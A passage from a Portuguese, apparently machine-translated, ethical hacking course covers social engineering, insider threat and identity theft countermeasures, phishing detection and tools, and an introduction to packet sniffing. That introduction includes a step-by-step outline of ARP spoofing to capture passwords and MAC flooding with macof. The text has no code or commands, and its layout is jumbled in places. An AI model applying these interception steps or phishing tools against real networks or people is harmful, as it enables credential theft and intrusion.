contra ataques de engenharia social, pois a vítima pode não saber que foi enganada. Eles são muito parecidos
com os outros tipos de ataques usados para extrair os dados valiosos de uma empresa. Para se proteger contra
ataques de engenharia social, uma empresa precisa avaliar o risco de diferentes tipos de ataques, estimar possíveis
perdas e conscientizar seus funcionários.
Esta seção trata das contramedidas que uma organização pode implementar para ficar mais segura contra ataques
de engenharia social.

Contramedidas de Engenharia Social
Políticas de senha Políticas de Segurança Física Estratégia de Defesa
ÿ Mudanças periódicas ÿ Identificação dos funcionários através da ÿ Campanha de

de senha emissão de carteiras de identidade, uniformes, engenharia social ÿ
etc.
Análise de lacunas ÿ
ÿ Evitando senhas
adivinháveis ÿ Acompanhamento de visitantes
Estratégias de remediação
ÿ Bloqueio de conta após ÿ Restringir o acesso ao trabalho

tentativas falhadas áreas
ÿ Aumento do comprimento e ÿ Destruição adequada de

complexidade de senhas documentos inúteis
ÿ Melhoria do sigilo das ÿ Empregar pessoal de segurança

senhas
Contramedidas de Engenharia Social
Os invasores implementam técnicas de engenharia social para induzir as pessoas a revelar informações confidenciais das
organizações. Eles usam engenharia social para realizar fraudes, roubo de identidade, espionagem industrial e outros
comportamentos de má reputação. Para se proteger contra ataques de engenharia social, as organizações devem
desenvolver políticas e procedimentos eficazes; no entanto, apenas desenvolvê-los não é suficiente.
Para ser verdadeiramente eficaz, uma organização deve:
ÿ Disseminar políticas entre os funcionários e fornecer educação e treinamento adequados.

O treinamento especializado beneficia funcionários em cargos de alto risco contra ameaças de engenharia social.
ÿ Obter assinaturas de funcionários em uma declaração reconhecendo que eles entendem o

políticas da organização.
ÿ Definir as consequências das violações da política.
Os principais objetivos das estratégias de defesa da engenharia social são criar conscientização do usuário, controles de
rede internos robustos e políticas, planos e processos de segurança.
As políticas e procedimentos oficiais de segurança ajudam os funcionários ou usuários a tomar as decisões de segurança
corretas. Devem incluir as seguintes salvaguardas:
ÿ Políticas de Senha
As políticas de senha que declaram as seguintes diretrizes ajudam a aumentar a segurança da senha:
o Altere as senhas regularmente.

o Evite senhas fáceis de adivinhar. É possível adivinhar senhas a partir de respostas a perguntas de
engenharia social, como “Onde você nasceu?” "Qual é o seu filme favorito?" ou "Qual é o nome do seu
animal de estimação?"
o Bloquear contas de usuário se um usuário exceder um determinado número de tentativas fracassadas de adivinhar
senha.
o Escolha longos (mínimo de 6 – 8 caracteres) e complexos (usando vários

caracteres alfanuméricos e especiais) senhas.
o Não divulgue senhas a ninguém.
As políticas de segurança de senha geralmente incluem conselhos sobre o gerenciamento adequado de senhas,
por exemplo:
o Evite compartilhar uma conta de computador.
o Evite usar a mesma senha para contas diferentes.
o Evite armazenar senhas em mídia ou escrevê-las em um bloco de notas ou adesivos

Nota.
o Evite comunicar senhas por telefone ou por e-mail ou SMS.
o Certifique-se de bloquear ou desligar o computador antes de se afastar dele.
ÿ Políticas de Segurança Física
As políticas de segurança física abordam as seguintes áreas.
o Emitir cartões de identificação (cartões de identidade) e uniformes, juntamente com outros controles de acesso
medidas para os funcionários da organização.
o A segurança ou o pessoal do escritório deve escoltar os visitantes às salas de visitantes designadas ou

salões.
o Restrinja o acesso a determinadas áreas de uma organização para evitar que usuários não autorizados
de comprometer a segurança de dados confidenciais.
o Descarte documentos antigos que contenham informações valiosas usando equipamentos como trituradores
de papel e lixeiras. Isso evita a coleta de informações por invasores que usam técnicas como mergulho
no lixo.
o Empregue pessoal de segurança em uma organização para proteger pessoas e propriedades —

complemente o pessoal de segurança treinado com sistemas de alarme, câmeras de vigilância e outros
equipamentos.
ÿ Estratégia de Defesa
o Campanha de Engenharia Social: Uma organização deve realizar vários exercícios de engenharia social
usando diferentes técnicas em um grupo diverso de pessoas para examinar como seus funcionários
podem reagir a ataques reais de engenharia social.
o Análise de lacunas: usando as informações obtidas da campanha de engenharia social, uma análise de
lacunas avalia a organização com base nas práticas líderes do setor, ameaças emergentes e estratégias
de mitigação.

o Estratégias de remediação: dependendo do resultado da avaliação na análise de

lacunas, as organizações desenvolvem um plano de remediação detalhado para
mitigar os pontos fracos ou as brechas encontradas na etapa anterior. O plano foca
principalmente na educação e conscientização dos funcionários com base em suas
funções e na identificação e mitigação de possíveis ameaças à organização.

Contramedidas de ameaças internas
Separação e rotação de
01 06 Registro e auditoria
funções
Menos privilégios 02 05 Monitoramento de funcionários
acesso controlado 03 04 Avaliação periódica de risco
Contramedidas de ameaças internas
Existem medidas de segurança que ajudam uma organização a prevenir ou minimizar ameaças internas:
ÿ Separação e rotação de funções: Divida as responsabilidades entre vários funcionários para restringir a
quantidade de poder ou influência de qualquer indivíduo. Isso ajuda a evitar fraudes, abusos e conflitos de
interesse e facilita a detecção de falhas de controle (incluindo burlar controles de segurança e roubo de
informações). A rotação de funções em intervalos aleatórios ajuda uma organização a impedir fraudes ou
abuso de privilégios.
ÿ Menos privilégios: Forneça aos usuários apenas o privilégio de acesso suficiente para permitir que eles
executar suas tarefas atribuídas. Isso ajuda a manter a segurança das informações.
ÿ Acesso controlado: Os controles de acesso em várias partes de uma organização restringem

usuários não autorizados obtenham acesso a ativos e recursos críticos.
ÿ Registro e auditoria: Realize registros e auditorias periodicamente para verificar o uso indevido de
recursos da empresa.
ÿ Monitoramento de funcionários: Use um software de monitoramento de funcionários que registre todas as sessões do usuário,
e que podem ser revistos por profissionais de segurança.
ÿ Políticas legais: Aplicar políticas legais para evitar que os funcionários façam uso indevido do
recursos da organização e roubo de dados confidenciais.
ÿ Arquivar dados críticos: Manter um registro dos dados críticos da organização na forma de
arquivos para serem usados como recursos de backup, se necessário.
ÿ Treinamento de funcionários sobre segurança cibernética: Treine os funcionários sobre como proteger suas
credenciais e os dados confidenciais da empresa contra ataques. Eles serão capazes de identificar tentativas
de engenharia social e tomar as devidas medidas de mitigação e relatórios.

ÿ Verificação dos antecedentes dos funcionários: Garanta verificações completas dos antecedentes de todos
os funcionários antes de contratá-los usando a pesquisa do Google e sites de redes sociais e consultando
empregadores anteriores.
ÿ Monitoramento de usuários privilegiados: implemente mecanismos de monitoramento adicionais para

administradores de sistema e usuários privilegiados, pois essas contas podem ser usadas para implantar
código malicioso ou bomba lógica no sistema ou na rede.
ÿ Desativação de credenciais para funcionários desligados: Desativar todos os perfis de acesso do funcionário
às localidades físicas, redes, sistemas, aplicativos e dados imediatamente após o desligamento.
ÿ Avaliações de risco periódicas: realize avaliações de risco periódicas em todos os ativos críticos da organização
e, em seguida, desenvolva e mantenha uma estratégia de gerenciamento de riscos para proteger esses ativos
de pessoas internas e externas.
ÿ Defesa em camadas: implemente várias camadas de defesa para prevenir e proteger ativos críticos contra
ataques remotos originados de pessoas internas. Desenvolva políticas e procedimentos de acesso remoto
apropriados para impedir tais ataques.
ÿ Segurança física: construa uma equipe de segurança profissional que monitore a segurança física da
organização.
ÿ Vigilância: Instale câmeras de vídeo para monitorar todos os ativos críticos. Instalar e habilitar
software de captura de tela em todos os servidores críticos.

Contramedidas de roubo de identidade
Proteja ou destrua todos os documentos que contenham suas

informações privadas
Certifique-se de que seu nome não esteja presente nas listas de sucesso dos profissionais de marketing
Revise o extrato do seu cartão de crédito regularmente e guarde-

o de forma segura, fora do alcance de outras pessoas
Nunca forneça informações pessoais por telefone
Mantenha seu e-mail seguro esvaziando a caixa de correio rapidamente
Contramedidas de roubo de identidade
O roubo de identidade ocorre quando alguém usa informações pessoais (como nome, CPF, data de nascimento, nome de solteira da
mãe ou endereço) de maneira maliciosa, como para cartão de crédito ou serviços de empréstimo, ou mesmo aluguéis e hipotecas,
sem conhecimento ou permissão da pessoa.
Listadas abaixo estão as contramedidas que, na implementação, reduzirão as chances de roubo de identidade:
ÿ Proteja ou destrua todos os documentos que contenham informações privadas
ÿ Certifique-se de que seu nome não esteja presente nas listas de sucesso dos profissionais de marketing
ÿ Reveja o extrato do seu cartão de crédito regularmente e guarde-o de forma segura, fora do alcance de outras pessoas
ÿ Nunca dê qualquer informação pessoal por telefone
ÿ Para manter o correio seguro, esvazie a caixa de correio rapidamente
ÿ Suspeitar e verificar todos os pedidos de dados pessoais
ÿ Proteger informações pessoais de serem divulgadas
ÿ Não exibir números de conta ou contato, a menos que seja obrigatório
ÿ Monitorizar as atividades bancárias online regularmente
ÿ Nunca liste quaisquer identificadores pessoais em sites de mídia social, como o nome do seu pai, nome do animal de
estimação, endereço ou cidade de nascimento.
ÿ Habilite a autenticação de dois fatores em todas as contas online
ÿ Nunca use Wi-Fi público para compartilhar ou acessar informações confidenciais
ÿ Instale ferramentas de segurança do host, como firewall e antivírus em seu computador pessoal

Como detectar e-mails de phishing?

Parece ser de um banco, empresa ou site de rede social e tem uma
1
saudação genérica
2 Parece ser de uma pessoa listada em seu catálogo de endereços de e-mail
3 Dá uma sensação de urgência ou uma ameaça velada
4 Pode conter erros gramaticais/ortográficos
5 Inclui links para sites falsificados
6 Pode conter ofertas que parecem boas demais para ser verdade
Inclui logotipos de aparência oficial e outras informações retiradas de

7
sites legítimos
8 Pode conter um anexo malicioso
Como detectar e-mails de phishing?
Para detectar e-mails de phishing, primeiro passe o ponteiro do mouse sobre o nome na coluna "De" .
Isso mostrará se o nome de domínio original está vinculado ao nome do remetente; se não for, pode ser um e-mail de
phishing. Por exemplo, um e-mail do Gmail.com provavelmente deve exibir seu domínio "De" como "gmail.com".
Verifique se o e-mail fornece um URL e solicita que o usuário clique nele. Nesse caso, certifique-se de que o link é
legítimo passando o ponteiro do mouse sobre ele (para exibir o URL do link) e certifique-se de que ele usa criptografia
(https://). Por segurança, sempre abra uma nova janela e visite o site digitando-o diretamente em vez de clicar no link
fornecido no e-mail.
Não forneça nenhuma informação ao site suspeito, pois ele provavelmente terá um link direto para o invasor.
Alguns outros indicadores de e-mails de phishing:

ÿ
Parece ser de um banco, empresa ou site de rede social e tem uma saudação genérica
ÿ
Parece ser de uma pessoa listada em seu catálogo de endereços de e-mail
ÿ
Tem um tom urgente ou faz uma ameaça velada
ÿ
Pode conter erros gramaticais ou ortográficos
ÿ
Inclui links para sites falsificados
ÿ
Pode conter ofertas que parecem boas demais para ser verdade
ÿ
Inclui logotipos de aparência oficial e outras informações retiradas de sites legítimos
ÿ
Pode conter um anexo malicioso

Figura 5.13: captura de tela mostrando um e-mail com indícios de phishing

Barra de Ferramentas Anti-Phishing
Netcraft PhishTankName
ÿ PhishTank é uma câmara de compensação colaborativa para
ÿ A comunidade anti-phishing Netcraft é um gigante
dados e informações sobre phishing na Internet
esquema de vigilância da vizinhança, capacitando os membros
mais alertas e experientes para defender todos dentro da ÿ Fornece uma API aberta para desenvolvedores e pesquisadores
comunidade contra ataques de phishing integrarem dados anti-phishing em seus aplicativos
https:// www.netcraft.com https:// www.phishtank.com
Barra de Ferramentas Anti-Phishing
ÿ Netcraft
Fonte: https:// www.netcraft.com
A comunidade anti-phishing Netcraft é um gigantesco esquema de vigilância da vizinhança, capacitando os

membros mais alertas e experientes para defender todos dentro da comunidade contra ataques de phishing.
A barra de ferramentas Netcraft fornece informações atualizadas sobre sites que os usuários visitam
regularmente e bloqueia sites perigosos. A barra de ferramentas fornece uma grande quantidade de
informações sobre sites populares. Esta informação ajudará a fazer uma escolha informada sobre a
integridade desses sites.
Conforme mostrado na captura de tela, o Netcraft protege indivíduos e organizações contra ataques de
phishing e fraudadores.

Figura 5.14: captura de tela do Netcraft
ÿ PhishTank
Fonte: https:// phishtank.com
PhishTank é uma câmara de compensação colaborativa para dados e informações sobre phishing na Internet.
Ele fornece uma API aberta para desenvolvedores e pesquisadores integrarem dados anti-phishing em seus
aplicativos.
Conforme mostrado na captura de tela, os profissionais de segurança podem usar o PhishTank para verificar
se uma URL maliciosa é um site de phishing ou não.

Figura 5.15: captura de tela do PhishTank

Ferramentas de engenharia social: kit de ferramentas de engenharia social (SET)
O Social-Engineer Toolkit (SET) é uma ferramenta baseada em Python de

Estrutura SpeedPhish (SPF)
código aberto destinada a testes de penetração em torno da engenharia social https:// github.com
Gophish
https:// getgophish.com
Rei Phisher
https:// github.com
LUCIA
https:// www.lucysecurity.com
MSI Simple
Phish https:// microsolved.com
https:// www.trustedsec.com
Ferramentas de engenharia social
ÿ Kit de Ferramentas de Engenharia Social (SET)
Fonte: https:// www.trustedsec.com
O Social-Engineer Toolkit (SET) é uma ferramenta baseada em Python de código aberto destinada a testes de penetração
por meio de engenharia social. É uma exploração genérica projetada para realizar ataques avançados contra elementos
humanos para comprometer um alvo e fazê-lo oferecer informações confidenciais. O SET categoriza ataques como ataques
de e-mail, web e USB de acordo com o vetor de ataque usado para enganar humanos. O kit de ferramentas ataca a
fraqueza humana, explorando a natureza confiante, medrosa, gananciosa e prestativa dos humanos.

Figura 5.16: Captura de tela do SET mostrando o menu e as opções de ataque
Algumas ferramentas de engenharia social estão listadas abaixo:
ÿ SpeedPhish Framework (SPF) (https:// github.com)

ÿ Gophish (https:// getgophish.com)
ÿ Rei Phisher (https:// github.com)
ÿ LUCY (https:// www.lucysecurity.com)
ÿ MSI Simple Phish (https:// microsolved.com)

Auditoria de segurança da organização para ataques de

phishing usando OhPhish
OhPhish é um portal baseado na web

para testar a suscetibilidade dos
funcionários a ataques de engenharia social
OhPhish é uma ferramenta de simulação

de phishing que fornece à organização
uma plataforma para lançar campanhas
de simulação de phishing em seus
funcionários
https:// ohphish.eccouncil.org
Auditoria de segurança da organização para ataques de phishing usando OhPhish
O objetivo principal de lançar campanhas de phishing contra funcionários da organização do cliente é avaliar a
suscetibilidade dos funcionários a ataques de phishing e ajudar a organização a reduzir os riscos que surgem quando
os funcionários são vítimas de ataques de phishing enviados por ciberameaças.
ÿ OhPhish
Fonte: https:// ohphish.eccouncil.org
OhPhish é um portal baseado na web para testar a suscetibilidade dos funcionários a ataques de engenharia
social. É uma ferramenta de simulação de phishing que fornece à organização uma plataforma para lançar
campanhas de simulação de phishing em seus funcionários. A plataforma captura as respostas e fornece
relatórios e tendências do MIS (em tempo real) que podem ser rastreados de acordo com o usuário,
departamento ou designação.
O OhPhish pode ser usado para auditar a segurança de uma organização quanto a ataques de phishing
usando vários métodos de phishing, como Entice to Click, Credential Harvesting, Send Attachment, Training,
Vishing e Smishing.

Figura 5.17: Captura de tela do OhPhish

Resumo do Módulo
Este módulo discutiu conceitos de engenharia social junto com várias fases de ataque de
engenharia social
Ele também discutiu várias técnicas de engenharia social baseadas em humanos,

computadores e dispositivos móveis
O módulo discutiu ameaças internas, incluindo os vários tipos de ameaças internas
Também discutiu o roubo de identidade e os tipos de roubo de identidade
O módulo terminou com uma discussão detalhada das contramedidas a serem empregadas
para se defender contra ataques de engenharia social, ameaças internas e roubo de identidade
No próximo módulo, discutiremos em detalhes vários ataques em nível de rede e

contramedidas
Resumo do Módulo
Este módulo discutiu os conceitos de engenharia social junto com as várias fases do ataque de
engenharia social. Ele também discutiu várias técnicas de engenharia social baseadas em humanos,
computadores e dispositivos móveis. O módulo discutiu ameaças internas, incluindo os vários tipos de
ameaças internas. Além disso, também discutiu o roubo de identidade e os tipos de roubo de identidade.
O módulo terminou com uma discussão detalhada das contramedidas a serem empregadas para se
defender contra ataques de engenharia social, ameaças internas e roubo de identidade.
No próximo módulo, discutiremos em detalhes os vários ataques e contramedidas em nível de rede.
MT
CE-Conselho
EC-Council
E
Ethical
HE
Hacking Essentials
Módulo 06
Ataques e contramedidas em nível de rede

Ataques e contramedidas no nível da rede
1 Compreendendo o sniffing de pacotes e os tipos de sniffing
2 Compreendendo várias técnicas e ferramentas de farejamento
3 Compreendendo as diferentes contramedidas de detecção
4 Visão geral dos diferentes tipos de ataques DoS e DDoS
5 Compreendendo diferentes ferramentas de ataque DoS/DDoS
Compreendendo diferentes contramedidas de ataque DoS/DDoS e

6 Ferramentas de proteção
7 Visão geral do sequestro de sessão e tipos de sequestro de sessão
8 Compreendendo diferentes ferramentas e contramedidas para seqüestro de sessão
Os invasores usam várias estratégias de ataque para comprometer a segurança de uma rede, potencialmente causando
interrupções, danos e perdas para organizações e indivíduos. Portanto, é importante que os profissionais de segurança tenham
entendimento dessas estratégias de ataque, pois tal entendimento é essencial para proteger a rede de diversos ataques.
Este módulo começa com uma visão geral dos conceitos de sniffing, técnicas de sniffing e contramedidas de sniffing. Ele fornece
informações sobre diferentes tipos de ataques DoS e DoS distribuídos (DDoS) e contramedidas. Posteriormente, o módulo discute
vários tipos de ataques de sequestro de sessão e termina com uma breve discussão sobre contramedidas para sequestro de
sessão.
No final deste módulo, os alunos serão capazes de fazer o seguinte:
ÿ Compreender o sniffing de pacotes e os tipos de sniffing
ÿ Explicar diferentes tipos de técnicas de sniffing
ÿ Use diferentes ferramentas de sniffing
ÿ Aplicar várias contramedidas de sniffing
ÿ Explicar os diferentes tipos de ataques DoS e DDoS
ÿ Use diferentes ferramentas de ataque DoS/DDoS
ÿ Aplicar conhecimento de contramedidas de ataque DoS/DDoS
ÿ Implementar diferentes ferramentas de proteção DoS/DDoS
ÿ Explicar o processo de sequestro de sessão e os tipos de sequestro de sessão
ÿ Use diferentes ferramentas de sequestro de sessão
ÿ Aplicar conhecimento de contramedidas de sequestro de sessão

cheirando
cheirando
O sniffing é geralmente usado por administradores de rede para realizar análises de rede, solucionar problemas de
rede e monitorar sessões de rede. Os invasores usam técnicas de detecção para investigar e capturar secretamente
informações críticas transmitidas em uma rede. É importante que os profissionais de segurança entendam os
conceitos e técnicas de sniffing para implementar medidas defensivas eficazes contra esses ataques.

Fluxo do módulo
Entenda o pacote
Conceitos de farejamento
1
Discutir Sniffing
2
Técnicas
Discutir Sniffing
Contramedidas
3
Entenda os conceitos de detecção de pacotes

Esta seção descreve sniffing e ameaças de rede, como um sniffer funciona, sniffing ativo e
passivo, como um invasor hackeia uma rede usando sniffers e protocolos vulneráveis a sniffing.

Packet Sniffing
ÿ Packet sniffing é o processo de monitorar e capturar todos os pacotes de dados que passam por uma determinada rede
usando um aplicativo de software ou dispositivo de hardware
ÿ Permite que um invasor observe e acesse todo o tráfego de rede a partir de um determinado ponto para coletar
informações confidenciais , como senhas Telnet, tráfego de e-mail, tráfego syslog, etc.
Troca
ferreiro Cópia dos dados que Com
passam pelo switch
Atacante
Packet Sniffing
Packet sniffing é o processo de monitoramento e captura de todos os pacotes de dados que passam por uma
determinada rede usando um aplicativo de software ou dispositivo de hardware. O sniffing é direto em redes
baseadas em hub, pois o tráfego em um segmento passa por todos os hosts associados a esse segmento.
No entanto, a maioria das redes hoje funciona em switches. Um switch é um dispositivo avançado de rede de
computadores. A principal diferença entre um hub e um switch é que um hub transmite dados de linha para
cada porta da máquina e não possui mapeamento de linha, enquanto um switch verifica o endereço Media
Access Control (MAC) associado a cada quadro que passa por ele e envia os dados para a porta necessária.
Um endereço MAC é um endereço de hardware que identifica exclusivamente cada nó de uma rede.
Um invasor precisa manipular a funcionalidade do switch para ver todo o tráfego que passa por ele. Um
programa de detecção de pacotes (também conhecido como farejador) pode capturar pacotes de dados
apenas de uma determinada sub-rede, o que significa que não pode detectar pacotes de outra rede.
Freqüentemente, qualquer laptop pode se conectar a uma rede e obter acesso a ela. As portas de switch de
muitas empresas estão abertas. Um sniffer de pacotes colocado em uma rede em modo promíscuo pode,
portanto, capturar e analisar todo o tráfego da rede. Os programas de detecção desligam o filtro empregado
pelas placas de interface de rede Ethernet (NICs) para impedir que a máquina host veja o tráfego de outras estações.
Assim, os programas de sniffing podem monitorar todo o tráfego.
Embora a maioria das redes hoje em dia empregue a tecnologia de comutação, o sniffing de pacotes ainda é
útil. Isso ocorre porque a instalação de programas de detecção remota em componentes de rede com fluxos
de tráfego intensos, como servidores e roteadores, é relativamente fácil. Ele permite que um invasor observe
e acesse todo o tráfego da rede a partir de um ponto. Os farejadores de pacotes podem capturar pacotes de
dados contendo informações confidenciais, como senhas, informações de conta, tráfego de syslog,
configuração de roteador, tráfego de DNS, tráfego de e-mail, tráfego da Web, sessões de bate-papo e senhas de FTP. Esse

permite que um invasor leia senhas em texto não criptografado, e-mails reais, números de cartão de
crédito, transações financeiras, etc. Também permite que um invasor detecte SMTP, POP, tráfego
IMAP, IMAP, HTTP Basic, autenticação telnet, banco de dados SQL, SMB, NFS e tráfego de FTP.
Um invasor pode obter uma quantidade substancial de informações lendo pacotes de dados
capturados; então, o invasor pode usar essas informações para invadir a rede. Um invasor realiza
ataques mais eficazes combinando essas técnicas com transmissão ativa.
O diagrama a seguir mostra um invasor farejando os pacotes de dados entre dois usuários legítimos
da rede:
Figura 6.1: Cenário de detecção de pacotes

Como funciona um farejador
Um sniffer coloca o NIC de um sistema no modo promíscuo para que escute todos os dados transmitidos
em seu segmento
PC do invasor executando NIC

Cartão em Promíscuo
Modo
Forças atacantes
mude para se comportar
como um hub
Troca Internet
Como funciona um farejador
A forma mais comum de computadores em rede é através de uma conexão Ethernet. Um computador conectado a uma
rede local (LAN) tem dois endereços: um endereço MAC e um endereço de Protocolo de Internet (IP). Um endereço MAC
identifica exclusivamente cada nó em uma rede e é armazenado na própria NIC. O protocolo Ethernet usa o endereço
MAC para transferir dados de e para um sistema durante a construção de quadros de dados. A camada de enlace de
dados do modelo OSI usa um cabeçalho Ethernet com o endereço MAC da máquina de destino em vez do endereço IP.
A camada de rede é responsável por mapear os endereços de rede IP para o endereço MAC conforme exigido pelo
protocolo de enlace de dados. Inicialmente, ele procura o endereço MAC da máquina de destino em uma tabela,
geralmente chamada de cache ARP (Address Resolution Protocol). Se não houver entrada para o endereço IP, uma
transmissão ARP de um pacote de solicitação será enviada para todas as máquinas na sub-rede local. A máquina com
esse endereço específico responde à máquina de origem com seu endereço MAC. O cache ARP da máquina de origem
adiciona esse endereço MAC à tabela. A máquina de origem, em todas as suas comunicações com a máquina de destino,
usa esse endereço MAC.
Existem dois tipos básicos de ambientes Ethernet, e os sniffers funcionam de maneira diferente em cada um.
Esses dois tipos são:
ÿ Ethernet Compartilhada
Em um ambiente Ethernet compartilhado, um único barramento conecta todos os hosts que competem por
largura de banda. Nesse ambiente, todas as outras máquinas recebem pacotes destinados a uma máquina.
Assim, quando a máquina 1 deseja falar com a máquina 2, ela envia um pacote na rede com o endereço MAC
de destino da máquina 2, junto com seu próprio endereço MAC de origem. As outras máquinas na Ethernet
compartilhada (máquinas 3 e 4) comparam o endereço MAC de destino do quadro com o seu próprio e descartam
o quadro incompatível.

No entanto, uma máquina executando um sniffer ignora essa regra e aceita todos os quadros.
O sniffing em um ambiente Ethernet compartilhado é passivo e, portanto, difícil de detectar.
ÿ Ethernet comutada
Em um ambiente Ethernet comutado, os hosts se conectam a um switch em vez de um hub.

O switch mantém uma tabela que rastreia o endereço MAC de cada computador e a porta física na qual esse
endereço MAC está conectado e, em seguida, entrega os pacotes destinados a uma máquina específica. O
switch é um dispositivo que envia pacotes apenas para o computador de destino; além disso, não os transmite a
todos os computadores da rede. Isso resulta em melhor utilização da largura de banda disponível e maior
segurança. Portanto, o processo de colocar um NIC de máquina em modo promíscuo para coletar pacotes não
funciona. Como resultado, muitas pessoas pensam que as redes comutadas são seguras e imunes a sniffing. No
entanto, isso não é verdade.
Embora um switch seja mais seguro que um hub, é possível farejar a rede usando os seguintes métodos:
ÿ Falsificação de ARP
ARP é sem estado. Uma máquina pode enviar uma resposta ARP mesmo sem solicitá-la; além disso, pode
aceitar tal resposta. Quando uma máquina deseja farejar o tráfego proveniente de outro sistema, ela pode
falsificar o gateway ARP da rede. O cache ARP da máquina de destino terá uma entrada incorreta para o
gateway. Assim, todo o tráfego destinado a passar pelo gateway passará agora pela máquina que falsificou o
endereço MAC do gateway.
ÿ Inundação MAC
Os switches mantêm uma tabela de tradução que mapeia vários endereços MAC para as portas físicas do
switch. Como resultado, eles podem rotear pacotes de forma inteligente de um host para outro. No entanto, os
switches têm uma memória limitada. A inundação de MAC usa essa limitação para bombardear switches com
endereços MAC falsos até que os switches não consigam mais acompanhar. Quando isso acontece com um
switch, ele entra no modo fail-open, no qual começa a atuar como um hub, transmitindo pacotes para todas as
portas do switch. Quando isso acontece, torna-se fácil realizar o sniffing. O macof é um utilitário que acompanha
o pacote dsniff e ajuda o invasor a executar inundações de MAC.
Uma vez que um switch se transforma em um hub, ele começa a transmitir todos os pacotes que recebe para todos os
computadores da rede. Por padrão, o modo promíscuo é desativado nas máquinas de rede; portanto, os NICs aceitam
apenas os pacotes endereçados à máquina de um usuário e descartam os pacotes enviados às outras máquinas. Um
sniffer transforma a NIC de um sistema em modo promíscuo para que escute todos os dados transmitidos em seu
segmento. Um sniffer pode monitorar constantemente todo o tráfego de rede para um computador por meio da NIC
decodificando as informações encapsuladas nos pacotes de dados. Os invasores configuram o NIC em suas máquinas
para executar em modo promíscuo para que o cartão comece a aceitar todos os pacotes. Assim, o invasor consegue
visualizar todos os pacotes que estão sendo transmitidos na rede.

Figura 6.2: Funcionamento de um farejador

Tipos de Sniffing
Sniffing passivo refere-se a sniffing através de um hub, em que o tráfego é enviado para
todas as portas
Passiva
cheirando Envolve o monitoramento de pacotes enviados por outros sem enviar nenhum pacote de
dados adicional no tráfego de rede
Cubo
Atacante
E
Observação: o sniffing passivo oferece vantagens furtivas significativas sobre o sniffing ativo
Tipos de Sniffing (continuação)
Farejamento Ativo
ÿ O sniffing ativo é usado para farejar uma rede baseada em switch
ÿ Envolve a injeção de pacotes de resolução de endereço (ARP) na rede para inundar o switch
Tabela Content Addressable Memory (CAM), que mantém o controle das conexões host-port
Técnicas de Farejamento Ativo
Inundação de MAC Ataques DHCP
Envenenamento de DNS Roubo de Porta do Switch
Envenenamento por ARP Ataque de falsificação
Tipos de Sniffing
Os invasores executam sniffers para converter o NIC do sistema host em modo promíscuo. Conforme
discutido anteriormente, o NIC no modo promíscuo pode então capturar pacotes endereçados à rede
específica.

Existem dois tipos de cheirar. Cada um é usado para diferentes tipos de redes. Os dois tipos são:
ÿ Farejamento Passivo
ÿ Sniffing ativo
Farejamento Passivo
O sniffing passivo não envolve o envio de pacotes. Ele simplesmente captura e monitora os pacotes que fluem na rede. Um
sniffer de pacote sozinho não é o preferido para um ataque porque funciona apenas em um domínio de colisão comum. Um
domínio de colisão comum é o setor da rede que não é comutado ou em ponte (ou seja, conectado por meio de um hub).
Domínios de colisão comuns estão presentes em ambientes de hub. Uma rede que usa hubs para conectar sistemas usa sniffing
passivo. Nessas redes, todos os hosts da rede podem ver todo o tráfego. Portanto, é fácil capturar o tráfego por meio do hub
usando detecção passiva.
Figura 6.3: sniffing passivo
Os invasores usam os seguintes métodos de detecção passiva para obter controle sobre uma rede de destino:
ÿ Comprometendo a segurança física: um invasor que consegue comprometer a segurança física de uma organização
de destino pode entrar na organização com um laptop e tentar se conectar à rede e capturar informações confidenciais
sobre a organização.
ÿ Usando um cavalo de Tróia: A maioria dos cavalos de Tróia possui capacidade de detecção integrada. Um invasor pode
instalá-los na máquina da vítima para comprometê-la. Depois de comprometer a máquina da vítima, o invasor pode
instalar um sniffer de pacotes e realizar o sniffing.
A maioria das redes modernas usa switches em vez de hubs. Um switch elimina o risco de sniffing passivo. No entanto, um
switch ainda é vulnerável ao sniffing ativo.
Observação: o sniffing passivo oferece vantagens de furtividade significativas sobre o sniffing ativo.
Farejamento Ativo
O sniffing ativo procura tráfego em uma LAN comutada injetando tráfego ativamente nela. O sniffing ativo também se refere ao
sniffing através de um switch. No sniffing ativo, a Ethernet comutada não transmite informações para todos os sistemas
conectados por meio da LAN, como ocorre em uma rede baseada em hub. Por esse motivo, um farejador passivo não consegue
farejar dados em uma rede comutada. É fácil detectar esses programas sniffer e altamente difícil realizar esse tipo de sniffing.
Os switches examinam os pacotes de dados em busca de endereços de origem e destino e os transmitem aos destinos
apropriados. Portanto, é complicado farejar os interruptores. No entanto, os invasores podem injetar tráfego ARP ativamente em
uma LAN para farejar uma rede comutada e capturar o tráfego. Os switches mantêm seu próprio cache ARP em Content
Addressable Memory (CAM). CAM é

um tipo especial de memória que mantém um registro de qual host está conectado a qual porta. Um sniffer registra
todas as informações visíveis na rede para revisão futura. Um invasor pode ver todas as informações nos pacotes,
incluindo dados que devem permanecer ocultos.
Para resumir os tipos de sniffing: o sniffing passivo não envia nenhum pacote; ele apenas monitora os pacotes enviados
por outros. O sniffing ativo envolve o envio de várias sondas de rede para identificar pontos de acesso.
A seguir está uma lista de diferentes técnicas de sniffing ativo:
ÿ Inundação MAC
ÿ Envenenamento de DNS
ÿ Intoxicação por ARP
ÿ Ataques DHCP
ÿ Roubo de porta de switch
ÿ Ataque de falsificação

Como um invasor invade a rede usando sniffers

Um invasor conecta seu desktop/laptop a uma porta de switch Ele/ela executa ferramentas de descoberta para aprender sobre a topologia de rede
01 04
Ele/ela identifica a máquina da vítima para direcionar seus ataques Ele/ela envenena a máquina da vítima usando técnicas de
falsificação de ARP
02 05
MiTM
O tráfego destinado à máquina da vítima é redirecionado para O hacker extrai senhas e dados confidenciais do tráfego
o atacante redirecionado
03 06
Como um invasor invade a rede usando sniffers

Os invasores usam ferramentas de detecção para detectar pacotes e monitorar o tráfego de rede em uma rede de destino.
As etapas que um invasor segue para usar sniffers para invadir uma rede são ilustradas abaixo.
ÿ Etapa 1: Um invasor que decide invadir uma rede primeiro descobre o switch apropriado
para acessar a rede e conecta um sistema ou laptop a uma das portas do switch.
Figura 6.4: Descobrindo um switch para acessar a rede
ÿ Etapa 2: um invasor que consegue se conectar à rede tenta determinar as informações da

rede, como a topologia da rede, usando ferramentas de descoberta de rede.
Figura 6.5: Usando ferramentas de descoberta de rede para aprender a topologia

ÿ Etapa 3: Ao analisar a topologia da rede, o invasor identifica a máquina da vítima para direcionar seus
ataques.
Figura 6.6: Identificando a máquina da vítima
ÿ Etapa 4: um invasor que identifica uma máquina de destino usa técnicas de falsificação de ARP para
enviar mensagens ARP (Address Resolution Protocol) falsas (falsificadas).
Figura 6.7: Invasor enviando mensagens ARP falsas
